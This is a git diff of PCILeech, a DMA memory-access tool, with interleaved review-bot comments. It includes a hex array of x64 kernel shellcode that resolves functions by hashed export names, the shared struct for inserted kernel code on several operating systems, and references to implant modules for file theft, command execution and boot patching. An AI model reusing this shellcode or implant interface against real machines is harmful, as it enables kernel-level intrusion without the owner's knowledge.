- 0x00, 0x00, 0x48, 0x89, 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x82,
- 0xa8, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x78, 0xce, 0xad, 0x90,
- 0x4d, 0x48, 0xc7, 0x45, 0x88, 0x57, 0x63, 0x32, 0x5a, 0x48, 0xc7, 0x45,
- 0x98, 0x8f, 0xb5, 0x6a, 0x6a, 0x48, 0xc7, 0x45, 0xa8, 0xf9, 0xbe, 0xdd,
- 0x05, 0x48, 0xc7, 0x45, 0xc8, 0xc9, 0xc5, 0x6e, 0x6c, 0x48, 0xc7, 0x45,
- 0x08, 0x3d, 0x28, 0xc3, 0x7c, 0x48, 0x89, 0x4d, 0x18, 0x48, 0x89, 0x4d,
- 0x28, 0x48, 0xc7, 0x45, 0x48, 0x61, 0x4c, 0x04, 0x5d, 0x48, 0xc7, 0x85,
- 0x88, 0x00, 0x00, 0x00, 0x50, 0x64, 0xb0, 0x6f, 0x48, 0x89, 0x85, 0x90,
- 0x00, 0x00, 0x00, 0x48, 0x8d, 0x5c, 0x24, 0x20, 0xb8, 0xe2, 0xca, 0x61,
- 0xe6, 0x48, 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x36, 0x31, 0x0e, 0x68,
- 0x48, 0x89, 0x85, 0x98, 0x00, 0x00, 0x00, 0xbf, 0x1a, 0x00, 0x00, 0x00,
- 0x48, 0x8d, 0x82, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85, 0xa0, 0x00,
- 0x00, 0x00, 0xb8, 0xde, 0x24, 0xe6, 0xf7, 0x48, 0x89, 0x85, 0xa8, 0x00,
- 0x00, 0x00, 0x48, 0x8d, 0x82, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85,
- 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x53, 0x08, 0x48, 0x8b, 0xce, 0xe8, 0x29,
- 0x00, 0x00, 0x00, 0x48, 0x8b, 0x0b, 0x48, 0x8d, 0x5b, 0x10, 0x48, 0x89,
- 0x01, 0x48, 0x83, 0xef, 0x01, 0x75, 0xe5, 0x4c, 0x8d, 0x9c, 0x24, 0xc0,
- 0x01, 0x00, 0x00, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x73, 0x18, 0x49,
- 0x8b, 0x7b, 0x20, 0x49, 0x8b, 0xe3, 0x5d, 0xc3, 0x48, 0x8b, 0xc4, 0x48,
- 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48, 0x89, 0x70, 0x18, 0x48,
- 0x89, 0x78, 0x20, 0x8b, 0xea, 0x48, 0x85, 0xc9, 0x74, 0x7a, 0xb8, 0x4d,
- 0x5a, 0x00, 0x00, 0x66, 0x39, 0x01, 0x75, 0x70, 0x48, 0x63, 0x41, 0x3c,
- 0x48, 0x03, 0xc1, 0x74, 0x67, 0x81, 0x38, 0x50, 0x45, 0x00, 0x00, 0x75,
- 0x5f, 0x8b, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48, 0x03, 0xd1, 0x74, 0x54,
- 0x44, 0x8b, 0x5a, 0x18, 0x45, 0x85, 0xdb, 0x74, 0x4b, 0x8b, 0x42, 0x20,
- 0x85, 0xc0, 0x74, 0x44, 0x8b, 0x72, 0x24, 0x4c, 0x8d, 0x0c, 0x01, 0x8b,
- 0x7a, 0x1c, 0x48, 0x03, 0xf1, 0x48, 0x03, 0xf9, 0x45, 0x33, 0xc0, 0x45,
- 0x85, 0xdb, 0x74, 0x2c, 0x45, 0x8b, 0x11, 0x4c, 0x03, 0xd1, 0x33, 0xdb,
- 0xeb, 0x0b, 0x0f, 0xb6, 0xc0, 0x49, 0xff, 0xc2, 0xc1, 0xcb, 0x0d, 0x03,
- 0xd8, 0x41, 0x8a, 0x02, 0x84, 0xc0, 0x75, 0xee, 0x3b, 0xdd, 0x74, 0x23,
- 0x41, 0xff, 0xc0, 0x49, 0x83, 0xc1, 0x04, 0x45, 0x3b, 0xc3, 0x72, 0xd4,
- 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x08, 0x48, 0x8b, 0x6c, 0x24, 0x10,
- 0x48, 0x8b, 0x74, 0x24, 0x18, 0x48, 0x8b, 0x7c, 0x24, 0x20, 0xc3, 0x46,
- 0x0f, 0xb7, 0x04, 0x46, 0x44, 0x3b, 0x42, 0x14, 0x73, 0xde, 0x42, 0x8b,
- 0x04, 0x87, 0x48, 0x03, 0xc1, 0xeb, 0xd7, 0x00
+ 0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x10, 0x48, 0x89, 0x78, 0x18, 0x4c,
+ 0x89, 0x70, 0x20, 0x55, 0x48, 0x8d, 0x68, 0xa1, 0x48, 0x81, 0xec, 0x90,
+ 0x00, 0x00, 0x00, 0x4c, 0x8b, 0xf1, 0xc7, 0x45, 0xe7, 0x4a, 0x45, 0x3b,
+ 0xd7, 0xc7, 0x45, 0xeb, 0x62, 0xe0, 0x07, 0x37, 0x48, 0x8d, 0xba, 0xc8,
+ 0x00, 0x00, 0x00, 0xc7, 0x45, 0xef, 0x1f, 0x9d, 0x48, 0x9d, 0x48, 0x8d,
+ 0x75, 0x4b, 0xc7, 0x45, 0xf3, 0xa1, 0x7b, 0xcc, 0xdc, 0xbb, 0x19, 0x00,
+ 0x00, 0x00, 0xc7, 0x45, 0xf7, 0x92, 0x6d, 0x58, 0x58, 0xc7, 0x45, 0xfb,
+ 0xce, 0xad, 0x90, 0x4d, 0xc7, 0x45, 0xff, 0x57, 0x63, 0x32, 0x5a, 0xc7,
+ 0x45, 0x03, 0x8f, 0xb5, 0x6a, 0x6a, 0xc7, 0x45, 0x07, 0xf9, 0xbe, 0xdd,
+ 0x05, 0xc7, 0x45, 0x0b, 0xf7, 0x38, 0xb3, 0x9d, 0xc7, 0x45, 0x0f, 0xc9,
+ 0xc5, 0x6e, 0x6c, 0xc7, 0x45, 0x13, 0x89, 0x83, 0x6c, 0xeb, 0xc7, 0x45,
+ 0x17, 0x9b, 0x97, 0x64, 0xcf, 0xc7, 0x45, 0x1b, 0x2a, 0xc0, 0xb2, 0xa8,
+ 0xc7, 0x45, 0x1f, 0x3d, 0x28, 0xc3, 0x7c, 0xc7, 0x45, 0x23, 0x2a, 0xd0,
+ 0x35, 0x30, 0xc7, 0x45, 0x27, 0xdb, 0x4f, 0x3d, 0xc5, 0xc7, 0x45, 0x2b,
+ 0x61, 0x4c, 0x04, 0x5d, 0xc7, 0x45, 0x2f, 0x9d, 0x8f, 0xa0, 0xc3, 0xc7,
+ 0x45, 0x33, 0xb8, 0xd4, 0x29, 0x88, 0xc7, 0x45, 0x37, 0x50, 0x64, 0xb0,
+ 0x6f, 0xc7, 0x45, 0x3b, 0xe2, 0xca, 0x61, 0xe6, 0xc7, 0x45, 0x3f, 0xde,
+ 0x24, 0xe6, 0xf7, 0xc7, 0x45, 0x43, 0x16, 0x35, 0xfd, 0x87, 0xc7, 0x45,
+ 0x47, 0x36, 0x31, 0x0e, 0x68, 0x48, 0x8d, 0x76, 0xfc, 0x49, 0x8b, 0xce,
+ 0x8b, 0x16, 0x48, 0x8d, 0x7f, 0xf8, 0xe8, 0x25, 0x00, 0x00, 0x00, 0x48,
+ 0x89, 0x07, 0x83, 0xc3, 0xff, 0x75, 0xe6, 0x4c, 0x8d, 0x9c, 0x24, 0x90,
+ 0x00, 0x00, 0x00, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x73, 0x18, 0x49,
+ 0x8b, 0x7b, 0x20, 0x4d, 0x8b, 0x73, 0x28, 0x49, 0x8b, 0xe3, 0x5d, 0xc3,
+ 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48,
+ 0x89, 0x70, 0x18, 0x48, 0x89, 0x78, 0x20, 0x8b, 0xea, 0x48, 0x85, 0xc9,
+ 0x74, 0x7a, 0xb8, 0x4d, 0x5a, 0x00, 0x00, 0x66, 0x39, 0x01, 0x75, 0x70,
+ 0x48, 0x63, 0x41, 0x3c, 0x48, 0x03, 0xc1, 0x74, 0x67, 0x81, 0x38, 0x50,
+ 0x45, 0x00, 0x00, 0x75, 0x5f, 0x8b, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48,
+ 0x03, 0xd1, 0x74, 0x54, 0x44, 0x8b, 0x5a, 0x18, 0x45, 0x85, 0xdb, 0x74,
+ 0x4b, 0x8b, 0x42, 0x20, 0x85, 0xc0, 0x74, 0x44, 0x8b, 0x72, 0x24, 0x4c,
+ 0x8d, 0x0c, 0x01, 0x8b, 0x7a, 0x1c, 0x48, 0x03, 0xf1, 0x48, 0x03, 0xf9,
+ 0x45, 0x33, 0xc0, 0x45, 0x85, 0xdb, 0x74, 0x2c, 0x45, 0x8b, 0x11, 0x4c,
+ 0x03, 0xd1, 0x33, 0xdb, 0xeb, 0x0b, 0x0f, 0xb6, 0xc0, 0x49, 0xff, 0xc2,
+ 0xc1, 0xcb, 0x0d, 0x03, 0xd8, 0x41, 0x8a, 0x02, 0x84, 0xc0, 0x75, 0xee,
+ 0x3b, 0xdd, 0x74, 0x23, 0x41, 0xff, 0xc0, 0x49, 0x83, 0xc1, 0x04, 0x45,
+ 0x3b, 0xc3, 0x72, 0xd4, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x08, 0x48,
+ 0x8b, 0x6c, 0x24, 0x10, 0x48, 0x8b, 0x74, 0x24, 0x18, 0x48, 0x8b, 0x7c,
+ 0x24, 0x20, 0xc3, 0x46, 0x0f, 0xb7, 0x04, 0x46, 0x44, 0x3b, 0x42, 0x14,
+ 0x73, 0xde, 0x42, 0x8b, 0x04, 0x87, 0x48, 0x03, 0xc1, 0xeb, 0xd7, 0x00
};
const BYTE LINUX_X64_VFS_KSH[] = {
diff --git a/pcileech/tlp.c b/pcileech/tlp.c
index 8258597..f573ccd 100644
--- a/pcileech/tlp.c
+++ b/pcileech/tlp.c
@@ -107,7 +107,7 @@ VOID TLP_Print(_In_ PBYTE pbTlp, _In_ DWORD cbTlp, _In_ BOOL isTx)
);
}
printf("\n");
- Util_PrintHexAscii(pbTlp, cbTlp);
+ Util_PrintHexAscii(pbTlp, cbTlp, 0);
}
BOOL TLP_CallbackMRd(_Inout_ PTLP_CALLBACK_BUF_MRd pBufferMRd, _In_ PBYTE pb, _In_ DWORD cb, _In_opt_ HANDLE hEventCompleted)
diff --git a/pcileech/util.c b/pcileech/util.c
index bf80b9b..f110612 100644
--- a/pcileech/util.c
+++ b/pcileech/util.c
@@ -664,14 +664,15 @@ VOID Util_WaitForPowerCycle(_Inout_ PPCILEECH_CONTEXT ctx)
Util_WaitForPowerOn(ctx);
}
-VOID Util_PrintHexAscii(_In_ PBYTE pb, _In_ DWORD cb)
+VOID Util_PrintHexAscii(_In_ PBYTE pb, _In_ DWORD cb, _In_ DWORD cbInitialOffset)
{
DWORD i, j;
- if(cb > 8192) {
- printf("Large output. Only displaying first 8192 bytes.\n");
- cb = 8192;
+ if(cb > 0x10000) {
+ printf("Large output. Only displaying first 65kB.\n");
+ cb = 0x10000 - cbInitialOffset;
}
- for(i = 0; i < cb + ((cb % 16) ? (16 - cb % 16) : 0); i++)
+ cb += cbInitialOffset;
+ for(i = cbInitialOffset; i < cb + ((cb % 16) ? (16 - cb % 16) : 0); i++)
{
// address
if(0 == i % 16) {
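Review bot: The new clamp in Util_PrintHexAscii only triggers when `cb` alone exceeds 0x10000, and `0x10000 - cbInitialOffset` wraps if the offset is larger than 0x10000; the util.h contract (offset at most 0x1000 and a multiple of 0x10) is documented but never checked, so the caller contract is the only thing keeping the indexes into `pb` in range. Suggest validating up front and clamping on the sum: `if((cbInitialOffset > 0x1000) || (cbInitialOffset % 0x10)) { return; }` and `if(cb + cbInitialOffset > 0x10000) {` with `cb = 0x10000 - cbInitialOffset;` as now. The message `Only displaying first 65kB.` describes 0x10000 bytes, which is 64 KiB; `64kB` avoids the confusion. The rest of the function, including the loop body that indexes `pb`, lies outside the hunk.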
diff --git a/pcileech/util.h b/pcileech/util.h
index 4187ac2..24acc29 100644
--- a/pcileech/util.h
+++ b/pcileech/util.h
@@ -221,7 +221,8 @@ VOID Util_WaitForPowerOn(_Inout_ PPCILEECH_CONTEXT ctx);
* Print a maximum of 8192 bytes of binary data as hexascii on the screen.
* -- pb
* -- cb
+* -- cbInitialOffset = offset, must be max 0x1000 and multiple of 0x10.
*/
-VOID Util_PrintHexAscii(_In_ PBYTE pb, _In_ DWORD cb);
+VOID Util_PrintHexAscii(_In_ PBYTE pb, _In_ DWORD cb, _In_ DWORD cbInitialOffset);
#endif /* __UTIL_H__ */
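Review bot: The unchanged first line of this comment still says `Print a maximum of 8192 bytes of binary data as hexascii on the screen.`, while the util.c hunk in this commit raises the limit to 0x10000 bytes. Update it to `* Print a maximum of 0x10000 (64kB) bytes of binary data as hexascii on the screen.`, and add that `pb` must hold at least `cbInitialOffset + cb` bytes, since the new loop starts indexing at the offset rather than at zero.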
diff --git a/pcileech_files/pcileech b/pcileech_files/pcileech
index f616eef..a97a219 100644
Binary files a/pcileech_files/pcileech and b/pcileech_files/pcileech differ
diff --git a/pcileech_files/pcileech.exe b/pcileech_files/pcileech.exe
index 55d67b3..ed332ad 100644
Binary files a/pcileech_files/pcileech.exe and b/pcileech_files/pcileech.exe differ
diff --git a/pcileech_files/uefi_textout.ksh b/pcileech_files/uefi_textout.ksh
index 3e628b2..63002a7 100644
Binary files a/pcileech_files/uefi_textout.ksh and b/pcileech_files/uefi_textout.ksh differ
diff --git a/pcileech_files/uefi_winload_ntos_patch.ksh b/pcileech_files/uefi_winload_ntos_patch.ksh
new file mode 100644
index 0000000..15c49f0
Binary files /dev/null and b/pcileech_files/uefi_winload_ntos_patch.ksh differ
diff --git a/pcileech_files/wx64_filepull.ksh b/pcileech_files/wx64_filepull.ksh
index 9f8013d..ab192b9 100644
Binary files a/pcileech_files/wx64_filepull.ksh and b/pcileech_files/wx64_filepull.ksh differ
diff --git a/pcileech_files/wx64_filepush.ksh b/pcileech_files/wx64_filepush.ksh
index f489f66..83a1fdc 100644
Binary files a/pcileech_files/wx64_filepush.ksh and b/pcileech_files/wx64_filepush.ksh differ
diff --git a/pcileech_files/wx64_pagesignature.ksh b/pcileech_files/wx64_pagesignature.ksh
index 102222d..3c6685b 100644
Binary files a/pcileech_files/wx64_pagesignature.ksh and b/pcileech_files/wx64_pagesignature.ksh differ
diff --git a/pcileech_files/wx64_pscmd.ksh b/pcileech_files/wx64_pscmd.ksh
index e53a3e1..95a3527 100644
Binary files a/pcileech_files/wx64_pscmd.ksh and b/pcileech_files/wx64_pscmd.ksh differ
diff --git a/pcileech_files/wx64_pscmd_user.ksh b/pcileech_files/wx64_pscmd_user.ksh
index 22000c9..fe610ac 100644
Binary files a/pcileech_files/wx64_pscmd_user.ksh and b/pcileech_files/wx64_pscmd_user.ksh differ
diff --git a/pcileech_files/wx64_pscreate.ksh b/pcileech_files/wx64_pscreate.ksh
index 70f13ed..8392b79 100644
Binary files a/pcileech_files/wx64_pscreate.ksh and b/pcileech_files/wx64_pscreate.ksh differ
diff --git a/pcileech_shellcode/fbsdx64_common.h b/pcileech_shellcode/fbsdx64_common.h
index a4dfb9e..3303f49 100644
--- a/pcileech_shellcode/fbsdx64_common.h
+++ b/pcileech_shellcode/fbsdx64_common.h
@@ -27,7 +27,7 @@ typedef unsigned long STATUS;
* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
* This page/struct is used to communicate between the inserted kernel code and
* the pcileech program.
-* VNR: 002
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
@@ -38,11 +38,11 @@ typedef struct tdKMDDATA {
QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
QWORD _status; // [0x030] status of operation
QWORD _result; // [0x038] result of operation TRUE|FALSE
- QWORD _address; // [0x040] virtual address to operate on.
+ QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
diff --git a/pcileech_shellcode/fbsdx64_stage3_c.c b/pcileech_shellcode/fbsdx64_stage3_c.c
index ac7ac26..de8378c 100644
--- a/pcileech_shellcode/fbsdx64_stage3_c.c
+++ b/pcileech_shellcode/fbsdx64_stage3_c.c
@@ -1,7 +1,7 @@
// fbsdx64_stage3_c.c : stage3 main shellcode.
// Compatible with FreeBSD x64.
//
-// (c) Ulf Frisk, 2016
+// (c) Ulf Frisk, 2016, 2017
// Author: Ulf Frisk, pcileech@frizk.net
//
@@ -55,30 +55,30 @@ typedef struct tdFNBSD { // function pointers to BSD functions and structs
* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
* This page/struct is used to communicate between the inserted kernel code and
* the pcileech program.
-* VNR: 002
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
- QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/OSX).
+ QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
QWORD AddrKallsymsLookupName; // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
QWORD DMASizeBuffer; // [0x018] size of DMA buffer.
QWORD DMAAddrPhysical; // [0x020] physical address of DMA buffer.
QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
QWORD _status; // [0x030] status of operation
QWORD _result; // [0x038] result of operation TRUE|FALSE
- QWORD _address; // [0x040] virtual address to operate on.
+ QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
QWORD dataInConsoleBuffer; // [0x118] physical address of 1-page console buffer.
QWORD dataIn[28]; // [0x120]
- QWORD dataOutExtraLength; // [0x200] length of extra in-data.
+ QWORD dataOutExtraLength; // [0x200] length of extra out-data.
QWORD dataOutExtraOffset; // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
- QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra in-data.
+ QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra out-data.
QWORD dataOutConsoleBuffer; // [0x218] physical address of 1-page console buffer.
QWORD dataOut[28]; // [0x220]
FNBSD fn; // [0x300] used by shellcode to store function pointers.
@@ -217,4 +217,4 @@ VOID stage3_c_EntryPoint(PKMDDATA pk)
pk->_op = KMD_CMD_COMPLETED;
idleCount = 0;
}
-}
\ No newline at end of file
+}
diff --git a/pcileech_shellcode/lx64_common.h b/pcileech_shellcode/lx64_common.h
index 072ed62..ee71a39 100644
--- a/pcileech_shellcode/lx64_common.h
+++ b/pcileech_shellcode/lx64_common.h
@@ -35,33 +35,33 @@ extern QWORD m_page_to_phys(QWORD p1);
extern VOID CacheFlush();
/*
-* KMD DATA struct. This struct must be contained in a 4096 byte section (page)
-* at the most. This data struct is used to communicate between the inserted
-* kernel code and the DMA reader/writer.
-* VNR: 002
+* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
+* This page/struct is used to communicate between the inserted kernel code and
+* the pcileech program.
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
- QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/OSX).
+ QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
QWORD AddrKallsymsLookupName; // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
QWORD DMASizeBuffer; // [0x018] size of DMA buffer.
QWORD DMAAddrPhysical; // [0x020] physical address of DMA buffer.
QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
- QWORD _status; // [0x030]
- QWORD _result; // [0x038]
- QWORD _address; // [0x040] virtual address to operate on.
+ QWORD _status; // [0x030] status of operation
+ QWORD _result; // [0x038] result of operation TRUE|FALSE
+ QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
QWORD dataInConsoleBuffer; // [0x118] physical address of 1-page console buffer.
QWORD dataIn[28]; // [0x120]
- QWORD dataOutExtraLength; // [0x200] length of extra in-data.
+ QWORD dataOutExtraLength; // [0x200] length of extra out-data.
QWORD dataOutExtraOffset; // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
- QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra in-data.
+ QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra out-data.
QWORD dataOutConsoleBuffer; // [0x218] physical address of 1-page console buffer.
QWORD dataOut[28]; // [0x220]
PVOID fn[32]; // [0x300] used by shellcode to store function pointers.
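Review bot: The resized `ReservedKMD[8]`/`ReservedFutureUse1[13]` pair keeps `dataInExtraLength` at 0x100 (0x58 + 0x40 + 0x68), but that arithmetic is enforced only by the hand-written offset comments, and the same struct is repeated verbatim in lx64_stage3_c.c, macos_common.h, macos_stage3_c.c, uefi_common.h and uefi_kmd_c.c in this commit, so a later edit to one copy can silently desynchronise the shared page layout that the VNR 003 bump is meant to pin. A compile-time check after the typedef (its closing brace is outside the hunk) would catch that, e.g. `typedef char kmddata_layout_check[(sizeof(KMDDATA) <= 0x1000 && offsetof(KMDDATA, dataInExtraLength) == 0x100) ? 1 : -1];`, assuming `<stddef.h>` is usable in the shellcode build; otherwise spell the offset expression out by hand. It would also help to state in the `ReservedKMD` comment which of the eight slots are assigned, since this commit only ever uses index 0.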
diff --git a/pcileech_shellcode/lx64_stage3_c.c b/pcileech_shellcode/lx64_stage3_c.c
index 3d71c3d..495f0e0 100644
--- a/pcileech_shellcode/lx64_stage3_c.c
+++ b/pcileech_shellcode/lx64_stage3_c.c
@@ -55,30 +55,30 @@ typedef struct tdFNLX { // VOID definitions for LINUX functions (used in main co
* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
* This page/struct is used to communicate between the inserted kernel code and
* the pcileech program.
-* VNR: 002
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
- QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/OSX).
+ QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
QWORD AddrKallsymsLookupName; // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
QWORD DMASizeBuffer; // [0x018] size of DMA buffer.
QWORD DMAAddrPhysical; // [0x020] physical address of DMA buffer.
QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
QWORD _status; // [0x030] status of operation
QWORD _result; // [0x038] result of operation TRUE|FALSE
- QWORD _address; // [0x040] virtual address to operate on.
+ QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
QWORD dataInConsoleBuffer; // [0x118] physical address of 1-page console buffer.
QWORD dataIn[28]; // [0x120]
- QWORD dataOutExtraLength; // [0x200] length of extra in-data.
+ QWORD dataOutExtraLength; // [0x200] length of extra out-data.
QWORD dataOutExtraOffset; // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
- QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra in-data.
+ QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra out-data.
QWORD dataOutConsoleBuffer; // [0x218] physical address of 1-page console buffer.
QWORD dataOut[28]; // [0x220]
FNLX fn; // [0x300] used by shellcode to store function pointers.
diff --git a/pcileech_shellcode/macos_common.c b/pcileech_shellcode/macos_common.c
index cd84620..e8b9fa0 100644
--- a/pcileech_shellcode/macos_common.c
+++ b/pcileech_shellcode/macos_common.c
@@ -89,7 +89,7 @@ BOOL GetMemoryMap(PKMDDATA pk, PBYTE pbBuffer4k_PhysicalMemoryRange, PQWORD pcbB
QWORD MapMemoryPhysical(PKMDDATA pk, QWORD qwMemoryBase)
{
for(DWORD i = 0; i < 512 * 8; i++) { // PT*8 -> Pages (16MB)
- ((PQWORD)(pk->ReservedKMD + 0x2000))[i] = 0x0000000000000003 | (qwMemoryBase + 0x1000 * i);
+ ((PQWORD)(pk->ReservedKMD[0] + 0x2000))[i] = 0x0000000000000003 | (qwMemoryBase + 0x1000 * i);
}
PageFlush();
return 0xffffee8000000000;
diff --git a/pcileech_shellcode/macos_common.h b/pcileech_shellcode/macos_common.h
index 649a131..83955e9 100644
--- a/pcileech_shellcode/macos_common.h
+++ b/pcileech_shellcode/macos_common.h
@@ -63,30 +63,30 @@ typedef struct tdFNMACOS { // function pointers to macOS functions (used in main
* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
* This page/struct is used to communicate between the inserted kernel code and
* the pcileech program.
-* VNR: 002
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
- QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/MACOS).
+ QWORD AddrKernelBase; // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
QWORD AddrKallsymsLookupName; // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
QWORD DMASizeBuffer; // [0x018] size of DMA buffer.
QWORD DMAAddrPhysical; // [0x020] physical address of DMA buffer.
QWORD DMAAddrVirtual; // [0x028] virtual address of DMA buffer.
QWORD _status; // [0x030] status of operation
QWORD _result; // [0x038] result of operation TRUE|FALSE
- QWORD _address; // [0x040] virtual address to operate on.
+ QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
QWORD dataInConsoleBuffer; // [0x118] physical address of 1-page console buffer.
QWORD dataIn[28]; // [0x120]
- QWORD dataOutExtraLength; // [0x200] length of extra in-data.
+ QWORD dataOutExtraLength; // [0x200] length of extra out-data.
QWORD dataOutExtraOffset; // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
- QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra in-data.
+ QWORD dataOutExtraLengthMax; // [0x210] maximum length of extra out-data.
QWORD dataOutConsoleBuffer; // [0x218] physical address of 1-page console buffer.
QWORD dataOut[28]; // [0x220]
FNMACOS fn; // [0x300] used by shellcode to store function pointers.
diff --git a/pcileech_shellcode/macos_stage3_c.c b/pcileech_shellcode/macos_stage3_c.c
index 7896b3b..f6ab241 100644
--- a/pcileech_shellcode/macos_stage3_c.c
+++ b/pcileech_shellcode/macos_stage3_c.c
@@ -85,7 +85,7 @@ typedef struct tdPHYSICAL_MEMORY_RANGE {
QWORD NumberOfBytes;
} PHYSICAL_MEMORY_RANGE, *PPHYSICAL_MEMORY_RANGE;
-typedef struct tdFNOSX { // function pointers to OSX functions (used in main control program)
+typedef struct tdFNMACOS { // function pointers to macOS functions (used in main control program)
QWORD _kernel_map;
QWORD _PE_state;
QWORD IOFree;
